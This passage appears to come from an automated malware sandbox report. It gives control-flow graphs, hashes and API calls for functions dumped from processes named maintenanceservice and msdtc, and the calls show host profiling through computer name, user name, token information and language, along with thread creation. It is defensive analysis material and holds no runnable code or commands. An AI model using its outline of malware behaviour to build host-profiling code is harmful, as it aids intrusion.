                                                                                                                                                                      control_flow_graph 332 d15b42-d15b47 call d15d90 334 d15b4c-d15b52 332->334 336 d15c42-d15c62 call d31280 334->336 337 d15b0d 334->337 355 d15c14-d15cc0 336->355 356 d15c26 336->356 337->336 339 d15b13 337->339 340 d15c8f-d15c96 339->340 342 d15c29 340->342 343 d15c98-d15c9a 340->343 346 d15cc2-d15cc9 call d152a0 342->346 347 d15c2f-d15c36 342->347 345 d15c9c 343->345 353 d15bfa 345->353 354 d15d0e-d15d18 345->354 357 d15c69 346->357 358 d15ccb 346->358 347->346 351 d15c3c 347->351 351->332 353->354 359 d15c00 353->359 360 d15d54 354->360 361 d15d1a 354->361 355->346 356->355 363 d15c28 356->363 365 d15b68-d15d75 357->365 366 d15c6f 357->366 358->345 364 d15ccd 358->364 359->355 367 d15d4b-d15d52 361->367 363->342 364->345 368 d15ccf-d15ce4 CreateThread 364->368 366->365 370 d15c75 366->370 367->360 371 d15d45-d15d47 367->371 375 d15c01-d15c05 368->375 376 d15cea 368->376 370->340 372 d15d49 371->372 373 d15d5f 371->373 372->367 372->373 379 d15d65 373->379 380 d15c20-d15c68 375->380 383 d15d37-d15d41 375->383 376->375 378 d15cf0-d15cf6 376->378 378->380 379->379 383->367 384 d15d43 383->384 384->360
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 4c86106278348862c253c82fe5af4d018df292bc93bde574725a398c8256bd08
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: 2F216B2020CF45EFCB699E18B4487F567A2ABD5310F5C02A69487CE19ECE2CCCC493B6
                                                                                                                                                                      Function 00D15B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 385 d15b09-d15d01 390 d15bb4-d15ce4 CreateThread 385->390 391 d15d07 385->391 395 d15c01-d15c05 390->395 396 d15cea 390->396 391->390 392 d15d0d 391->392 399 d15c20-d15c68 395->399 402 d15d37-d15d41 395->402 396->395 398 d15cf0-d15cf6 396->398 398->399 403 d15d43 402->403 404 d15d4b-d15d52 402->404 406 d15d54 403->406 405 d15d45-d15d47 404->405 404->406 407 d15d49 405->407 408 d15d5f 405->408 407->404 407->408 409 d15d65 408->409 409->409
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: adfa04914670cdd434a225d1710552de40b2667f27f97ca9f460e2a4ab5ce86c
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: 5201C43010DF46EFDB555A24BD143F667A1ABD0324F69019B84C7CA09DDEAC89C0A7B2
                                                                                                                                                                      Function 00D15B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 410 d15b87-d15d01 CreateThread 414 d15bb4-d15ce4 CreateThread 410->414 415 d15d07 410->415 419 d15c01-d15c05 414->419 420 d15cea 414->420 415->414 416 d15d0d 415->416 423 d15c20-d15c68 419->423 426 d15d37-d15d41 419->426 420->419 422 d15cf0-d15cf6 420->422 422->423 427 d15d43 426->427 428 d15d4b-d15d52 426->428 430 d15d54 427->430 429 d15d45-d15d47 428->429 428->430 431 d15d49 429->431 432 d15d5f 429->432 431->428 431->432 433 d15d65 432->433 433->433
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: 430362f4f6dc23adf0083e34db8a3a64cf7dbf1b49a56b9c5cf8517180237c42
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 60E04F2060DB449FDB599B24B9103593AA5ABC8314F19018AC48AD7199CF7D494547A2
                                                                                                                                                                      Function 00D1599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 434 d1599b-d1599e 435 d159f7 434->435 436 d159b8 call d30df0 434->436 438 d15a02 435->438 439 d159bd-d159c2 call d15d90 436->439 442 d159d4 438->442 443 d1597d 438->443 444 d159c7-d159ce 439->444 445 d159d8 442->445 446 d1593b-d15a15 call d311a0 442->446 443->442 447 d1597f-d15981 443->447 448 d159d0 444->448 449 d15a1a-d15a26 444->449 452 d159d9-d159de call d42190 445->452 451 d15983-d15a38 447->451 448->449 453 d159d2-d159de 448->453 455 d159a1-d159b5 call d15e10 449->455 456 d15a2c-d15a34 449->456 461 d15994-d1599c 451->461 462 d15a3e 451->462 452->461 468 d159e0 452->468 453->461 453->468 455->436 467 d15a08-d15a0b 455->467 456->452 461->438 463 d1599e 461->463 462->456 463->435 467->461 469 d15a0d 467->469 468->461 470 d159e2-d159ec 468->470 477 d15991 469->477 478 d15932 469->478 472 d15a62-d15a6e 470->472 473 d159ee-d159ef 470->473 474 d15a70 472->474 475 d15a75-d15ab3 call d31280 472->475 473->451 476 d159f1 call d49970 473->476 474->475 479 d15a72 474->479 488 d15ab5 475->488 489 d15abb-d15ac9 475->489 476->436 477->478 482 d15993 477->482 479->475 482->461 488->489 490 d15ab7-d15ab9 488->490 491 d15af2-d15af5 489->491 490->489 495 d15ad5 491->495 496 d15adb-d15adc 491->496 495->496 497 d15ad7-d15ad9 495->497 498 d15ae2 496->498 499 d15a45-d15a46 496->499 497->496 498->499 500 d15ae8 498->500 500->491
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: dbe6dc8b53a1c8ce73a8baddd9ba02cf02c8450d2af8fd7095abc9a74a299452
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C01A26164DE80FFD6569A1870512F96592FBD9320F2C0596A08ACB09EDD2C99C09F73
                                                                                                                                                                      Function 00D18090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 501 d18090-d18096 502 d18184 501->502 503 d18186 CloseHandle 502->503 504 d1818c-d18192 502->504 503->504 505 d18115-d18118 504->505 506 d18194 504->506 507 d180a7 505->507 508 d18119-d1811a 505->508 506->505 509 d1819a 506->509 508->507 511 d1811c 508->511 510 d1813c 509->510 510->502 512 d1820f 511->512 513 d18215-d1821e 512->513 514 d1808e-d18096 512->514 513->514 516 d18224 513->516 514->502 514->507 517 d181d7-d181e6 call d4715c 516->517 518 d18226 516->518 528 d18089 517->528 529 d180ca-d1810f GetTokenInformation 517->529 518->517 519 d18228-d182ee call d15d90 518->519 530 d182f0 519->530 531 d1830c-d1831e 519->531 528->529 533 d1808b 528->533 534 d18111 529->534 535 d1812d 529->535 530->531 536 d182f2 530->536 537 d182a1-d182ba call d15d90 call d1ec00 531->537 538 d18320 531->538 539 d1808c 533->539 534->535 540 d18113 534->540 543 d18133 535->543 544 d180a8 535->544 541 d182f7-d182fc call d15d90 536->541 537->538 538->541 545 d18322 538->545 539->514 540->505 562 d18253-d18265 call d31280 541->562 563 d18302 541->563 543->510 549 d181ed-d181f0 543->549 546 d180aa-d180ad 544->546 545->541 550 d18324-d18326 545->550 552 d18163-d18170 call d47164 546->552 553 d180b3-d18203 546->553 554 d181f6 549->554 555 d180da-d180f1 549->555 551 d18328 550->551 570 d18335 551->570 571 d182df-d1832b 551->571 552->503 573 d18172 552->573 553->552 569 d18209 553->569 554->555 561 d181fc 554->561 555->546 567 d181fe-d18201 GetTokenInformation 561->567 562->551 581 d1826b 562->581 563->562 568 d18308-d1830a 563->568 567->512 586 d181b7 567->586 568->531 574 d1826e-d18285 570->574 571->570 578 d1832d-d18331 571->578 573->504 579 d18287 574->579 580 d1829b-d1829d 574->580 578->570 584 d1824c 579->584 580->537 581->574 585 d18239 581->585 584->580 587 d1824e-d18252 584->587 585->551 588 d1823f-d18243 585->588 586->512 589 d181b9-d181ca 586->589 587->574 588->541 588->584 592 d181d0 589->592 593 d180f3 589->593 592->567 598 d180c3 592->598 593->539 594 d180f5 593->594 594->539 599 d18077 594->599 598->567 600 d180c9 598->600 599->517 600->529
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: b6eaa31116e102f82f926e518120e1014d7e8461ebb034030a7b4b815515f449
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: 01C08CA332CF02B6523883587C0F0F026208303762B0C000AAC4280220DE04CEC330B7
                                                                                                                                                                      Function 00D1817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 601 d1817f 602 d18184 601->602 603 d18186 CloseHandle 602->603 604 d1818c-d18192 602->604 603->604 605 d18115-d18118 604->605 606 d18194 604->606 607 d180a7 605->607 608 d18119-d1811a 605->608 606->605 609 d1819a 606->609 608->607 611 d1811c 608->611 610 d1813c 609->610 610->602 612 d1820f 611->612 613 d18215-d1821e 612->613 614 d1808e-d18096 612->614 613->614 616 d18224 613->616 614->602 614->607 617 d181d7-d181e6 call d4715c 616->617 618 d18226 616->618 628 d18089 617->628 629 d180ca-d1810f GetTokenInformation 617->629 618->617 619 d18228-d182ee call d15d90 618->619 630 d182f0 619->630 631 d1830c-d1831e 619->631 628->629 633 d1808b 628->633 634 d18111 629->634 635 d1812d 629->635 630->631 636 d182f2 630->636 637 d182a1-d182ba call d15d90 call d1ec00 631->637 638 d18320 631->638 639 d1808c 633->639 634->635 640 d18113 634->640 643 d18133 635->643 644 d180a8 635->644 641 d182f7-d182fc call d15d90 636->641 637->638 638->641 645 d18322 638->645 639->614 640->605 662 d18253-d18265 call d31280 641->662 663 d18302 641->663 643->610 649 d181ed-d181f0 643->649 646 d180aa-d180ad 644->646 645->641 650 d18324-d18326 645->650 652 d18163-d18170 call d47164 646->652 653 d180b3-d18203 646->653 654 d181f6 649->654 655 d180da-d180f1 649->655 651 d18328 650->651 670 d18335 651->670 671 d182df-d1832b 651->671 652->603 673 d18172 652->673 653->652 669 d18209 653->669 654->655 661 d181fc 654->661 655->646 667 d181fe-d18201 GetTokenInformation 661->667 662->651 681 d1826b 662->681 663->662 668 d18308-d1830a 663->668 667->612 686 d181b7 667->686 668->631 674 d1826e-d18285 670->674 671->670 678 d1832d-d18331 671->678 673->604 679 d18287 674->679 680 d1829b-d1829d 674->680 678->670 684 d1824c 679->684 680->637 681->674 685 d18239 681->685 684->680 687 d1824e-d18252 684->687 685->651 688 d1823f-d18243 685->688 686->612 689 d181b9-d181ca 686->689 687->674 688->641 688->684 692 d181d0 689->692 693 d180f3 689->693 692->667 698 d180c3 692->698 693->639 694 d180f5 693->694 694->639 699 d18077 694->699 698->667 700 d180c9 698->700 699->617 700->629
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: c33d68779d3da6df1532d2a92ec7ae283d24a09c954146e03abe98fb69a1a7c2
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: 9EC092E3658B09B75138A7A9BC0E0F135604713B62F0C4512FC068A360DE588DC371B2

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:4.2%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.3%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:75
                                                                                                                                                                      Total number of Limit Nodes:5
                                                                                                                                                                      execution_graph 5611 5581b1 5615 558075 5611->5615 5612 558186 CloseHandle 5612->5615 5613 5580ca GetTokenInformation 5613->5615 5614 5581ad GetTokenInformation 5614->5615 5615->5612 5615->5613 5615->5614 5616 5580a7 5615->5616 5659 558090 5663 558075 5659->5663 5660 558186 CloseHandle 5660->5663 5661 5580ca GetTokenInformation 5661->5663 5662 5581ad GetTokenInformation 5662->5663 5663->5660 5663->5661 5663->5662 5664 5580a7 5663->5664 5696 5557f0 5699 5555ac 5696->5699 5697 5555e4 5699->5696 5699->5697 5700 573870 5699->5700 5701 573876 5700->5701 5703 573893 5701->5703 5704 573720 5701->5704 5703->5699 5707 560c42 5704->5707 5705 5737dd 5705->5703 5706 55e050 VirtualAlloc 5706->5707 5707->5704 5707->5705 5707->5706 5603 555b87 CreateThread 5604 555b1c 5603->5604 5609 555810 5603->5609 5605 555cdf CreateThread 5604->5605 5606 555c01 5604->5606 5605->5606 5607 5554a0 5605->5607 5608 5554b5 5607->5608 5610 555822 5609->5610 5617 555b00 5618 555bba 5617->5618 5625 5652c0 5618->5625 5620 555bc7 5624 555bde 5620->5624 5630 570080 5620->5630 5626 5652c6 5625->5626 5629 5652ce 5625->5629 5626->5629 5644 55e050 5626->5644 5629->5620 5635 570089 5630->5635 5631 5703e0 GetComputerNameW 5631->5635 5632 570181 VirtualFree 5632->5635 5633 55e050 VirtualAlloc 5633->5635 5634 5703bf GetUserNameW 5634->5635 5635->5631 5635->5632 5635->5633 5635->5634 5636 5704d6 GetComputerNameW 5635->5636 5637 555c7b 5635->5637 5636->5635 5638 558070 5637->5638 5642 558075 5638->5642 5639 558186 CloseHandle 5639->5642 5640 5580ca GetTokenInformation 5640->5642 5641 5581ad GetTokenInformation 5641->5642 5642->5639 5642->5640 5642->5641 5643 5580a7 5642->5643 5643->5624 5645 55e0c3 5644->5645 5646 55e0d8 VirtualAlloc 5645->5646 5646->5645 5652 555860 5653 5652c0 VirtualAlloc 5652->5653 5654 555869 5653->5654 5655 570080 5 API calls 5654->5655 5656 55587d 5655->5656 5657 558070 3 API calls 5656->5657 5658 555870 5657->5658 5647 555b42 5648 555b07 5647->5648 5648->5647 5649 555cdf CreateThread 5648->5649 5650 555b68 5648->5650 5649->5650 5651 5554a0 5649->5651 5708 5555ef 5711 5555ac 5708->5711 5709 573870 VirtualAlloc 5709->5711 5710 5555e4 5711->5709 5711->5710 5685 555b09 5686 555b16 5685->5686 5687 555cdf CreateThread 5686->5687 5688 555c01 5686->5688 5687->5688 5689 5554a0 5687->5689

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 005552A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 291 5552a0-5553fe 296 555404-55540e 291->296 297 590d4c-590d4e 291->297 298 555424 296->298 299 55539b 298->299 300 55542a 298->300 301 555413-555419 299->301 302 55539d-5553a1 299->302 300->299 303 555430-555443 300->303 304 5553a7 302->304 305 5552b0-5552b5 302->305 304->305 306 5553ad 304->306 307 5553f3-5553f9 306->307 308 5553af 306->308 312 555355 307->312 313 55532a 307->313 309 5553e0-5553f1 308->309 309->301 309->307 317 5552d1-5552e7 312->317 318 5552e8-555363 312->318 313->312 314 55532c-55533f 313->314 316 55536b-555390 314->316 325 5553c3 316->325 326 555392-55539a 316->326 317->318 323 555365 318->323 324 5553d1-5553d5 318->324 323->324 328 555367-555369 323->328 324->302 327 5553d7 324->327 326->302 327->309 329 555342-555345 327->329 328->316 330 555400-55540e 329->330 331 55534b 329->331 330->298 331->330 332 555351-555353 331->332 332->312
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 005553C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: a19e88ae820cd11d5020602164a4ea8ddf3b847c10d95e97f0139264fee668ba
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: 4541B66540DE958FDB264A6444743747FA0BB113E3F9A0CE7DC8A8A1E2F1985C8D9326
                                                                                                                                                                      Function 00570080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 570080-570286 2 57028c 0->2 3 570099-570575 0->3 5 570445 2->5 6 570155 3->6 7 57057b 3->7 5->3 8 57044b-570457 5->8 11 5702ef-570495 call 55e050 * 2 6->11 7->6 10 570581-570587 7->10 9 570458-570472 GetComputerNameW 8->9 18 5703ee-5703f4 9->18 19 57024c-570253 9->19 13 57058b 10->13 11->9 55 57043e 11->55 16 570181 VirtualFree 13->16 17 57058c-570591 13->17 25 5701a8-5702ac call 587164 16->25 20 570597 17->20 21 5704ab-5704af 17->21 35 5700da-57023f 18->35 36 5703fa 18->36 22 5701e6 19->22 23 570255 19->23 20->21 27 57059d 20->27 46 5704c7 21->46 31 5702b1-5702be 22->31 32 5701ec-570313 call 58715c 22->32 28 5702d3 23->28 25->31 27->21 28->22 34 5702d9 28->34 41 5702c4 31->41 42 5703bf-5703d9 GetUserNameW 31->42 52 570318-57031e 32->52 34->11 35->19 50 570241-57024a 35->50 36->35 43 570400 36->43 41->42 48 5702ca 41->48 49 570331 42->49 51 57b1ee-57b49f 43->51 58 5704cc-5704e6 call 589970 GetComputerNameW 46->58 48->28 53 570337 49->53 54 570171 49->54 50->19 50->31 56 570324 52->56 57 570568-57056b 52->57 53->54 61 57033d 53->61 59 570173 54->59 60 57013f-570146 54->60 55->5 56->57 63 57032a 56->63 57->58 70 570131 58->70 71 5704ec-570514 58->71 65 570230 59->65 60->13 66 5705d0-5705d9 61->66 63->49 65->46 67 570236-5705c2 65->67 66->51 67->46 74 5705c8-5705c9 67->74 72 570137 70->72 73 570089-57008c 70->73 71->57 72->73 76 57013d 72->76 73->25 75 570092 73->75 74->66 75->25 78 570098 75->78 76->16 76->60 78->3
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction ID: 3c520f8fee02408287fec705a2d091c54743883fa2fc19a9b9c1a37ce60ab265
                                                                                                                                                                      • Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction Fuzzy Hash: 6CD11831418B09CBCB24EF58EC497EABBD1FB90310F589A1FD84AC31A5DA74D645D6C2
                                                                                                                                                                      Function 00558070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 79 558070-55817e 81 558180 79->81 82 55813d-5581a5 79->82 81->82 85 558161 81->85 88 5581a7 82->88 89 5581bd-5581ca 82->89 87 558163-558170 call 587164 85->87 93 558186 CloseHandle 87->93 94 558172 87->94 95 5581d0 89->95 96 5580f3 89->96 97 55818c-558192 93->97 94->97 110 5580c3 95->110 111 5581fe-558201 GetTokenInformation 95->111 98 5580f5 96->98 99 55808c 96->99 101 558115-558118 97->101 102 558194 97->102 98->99 113 558077 98->113 104 55808e-558184 99->104 106 5580a7 101->106 107 558119-55811a 101->107 102->101 108 55819a 102->108 104->93 104->97 107->106 112 55811c 107->112 108->82 110->111 115 5580c9 110->115 116 55820f 111->116 123 5581b7 111->123 112->116 117 5581d7-5581de call 58715c 113->117 121 5580ca-5580d8 GetTokenInformation 115->121 116->104 119 558215-55821e 116->119 124 5581e3-5581e6 117->124 119->104 131 558224 119->131 125 55810f 121->125 123->116 126 5581b9-5581bb 123->126 124->121 139 558089 124->139 128 558111 125->128 129 55812d 125->129 126->89 128->129 132 558113 128->132 134 558133-5581f0 129->134 135 5580a8 129->135 131->117 137 558226 131->137 132->101 143 5581f6 134->143 144 5580da-5580f1 134->144 136 5580aa-5580ad 135->136 136->87 141 5580b3-558203 136->141 137->117 142 558228-5582ee call 555d90 137->142 139->121 140 55808b 139->140 140->99 141->87 148 558209 141->148 154 5582f0 142->154 155 55830c-558320 call 555d90 call 55ec00 142->155 143->144 147 5581fc 143->147 144->136 147->111 154->155 156 5582f2 154->156 158 5582f7-5582fc call 555d90 155->158 170 558322 155->170 156->158 164 558253-558265 call 571280 158->164 165 558302 158->165 172 558328 164->172 173 55826b 164->173 165->164 167 558308-55830a 165->167 167->155 170->158 174 558324-558326 170->174 178 558335 172->178 179 5582df-55832b 172->179 173->172 177 55823f-558243 173->177 174->172 177->158 182 558287 178->182 183 55829b-55829d 178->183 179->178 184 55832d-558331 179->184 182->183 186 55824e-558252 182->186 184->178 186->164
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction ID: d2b67ccaef53287bce69da2dd3a4e4d1f1d5d243386a0260e9a1d4bf18d2358b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction Fuzzy Hash: 4E61FE3460CE459FC7658B2888382357EA0FB55353F680A5BEC47E31A0DF249C4DD752
                                                                                                                                                                      Function 00555910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 187 555910-555968 189 555915-5559b8 call 589970 call 570df0 187->189 190 55596a 187->190 203 5559bd-5559c2 call 555d90 189->203 190->189 194 555931-56072c 190->194 197 560806-560809 194->197 198 560732-560738 194->198 206 56079d-5607a6 197->206 201 560800 198->201 202 56073e 198->202 201->197 205 5606b3-5606b7 201->205 202->201 207 560744-560774 202->207 208 5559c7-5559ce 203->208 205->206 209 5606bd 205->209 210 560791-560793 206->210 211 5607a8 206->211 213 5606d5-5606d9 207->213 214 56077a-56081c 207->214 215 5559d0 208->215 216 555a1a-555a26 call 555e10 208->216 209->206 217 5606c3-5607fe 209->217 218 5607ca-5607cc 210->218 211->210 219 5607aa 211->219 223 5606df 213->223 224 5606db 213->224 214->206 215->216 221 5559d2 215->221 239 555994-55599c 216->239 240 555a0d 216->240 217->201 219->218 226 5559d4-555a15 call 5711a0 221->226 223->206 224->223 227 5606dd 224->227 227->223 231 56c0cc 227->231 233 56c0ce-56c0d0 231->233 234 56c0e8-56c102 231->234 238 56c0d2-56c0df 233->238 237 56c104 234->237 234->238 237->238 248 56c0e7 237->248 238->248 244 555a02 239->244 245 55599e-5559f7 239->245 250 555991 240->250 251 555932 240->251 244->226 253 55597d 244->253 245->244 250->251 254 555993 250->254 255 5559e4-5559ec call 5821ac 251->255 253->226 256 55597f-555981 253->256 254->239 261 555a62-555a6e 255->261 262 5559ed 255->262 258 555983-555a38 256->258 258->239 264 555a3e call 582190 258->264 265 555a75-555ab3 call 571280 261->265 266 555a70 261->266 262->258 263 5559ee-5559ef 262->263 263->258 267 5559f1 263->267 264->239 276 5559e0 264->276 278 555ab5 265->278 279 555abb-555ac9 265->279 266->265 268 555a72 266->268 267->189 268->265 276->239 280 5559e2 276->280 278->279 281 555ab7-555ab9 278->281 282 555af2-555af5 279->282 280->255 281->279 285 555ad5 282->285 286 555adb-555adc 282->286 285->286 287 555ad7-555ad9 285->287 288 555a45-555a46 286->288 289 555ae2 286->289 287->286 289->288 290 555ae8 289->290 290->282
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
